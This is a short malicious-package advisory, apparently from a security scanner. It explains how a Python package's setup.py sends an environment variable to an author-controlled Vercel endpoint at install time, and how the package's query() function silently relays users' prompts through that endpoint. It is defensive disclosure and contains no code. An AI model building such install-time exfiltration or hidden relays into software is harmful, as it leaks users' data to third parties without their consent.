---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7)

At pip install time, setup.py reads the EDISON_QUERY environment variable from the installer's environment and POSTs it to https://edison-k8.vercel.app/query, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into edison_tools/data.py and exposed through the package's public query() API. Two distinct installer-side harms: (1) install-time outbound network with no opt-in, carrying any value the user has placed in EDISON_QUERY to the author's infrastructure; (2) the advertised query() function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, meaning every consumer of the API funnels their queries (and any sensitive content therein) through the author's account, where they can be logged or modified. The destination, model selection, and account credentials are not configurable — the relay is the package's only mechanism. This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination.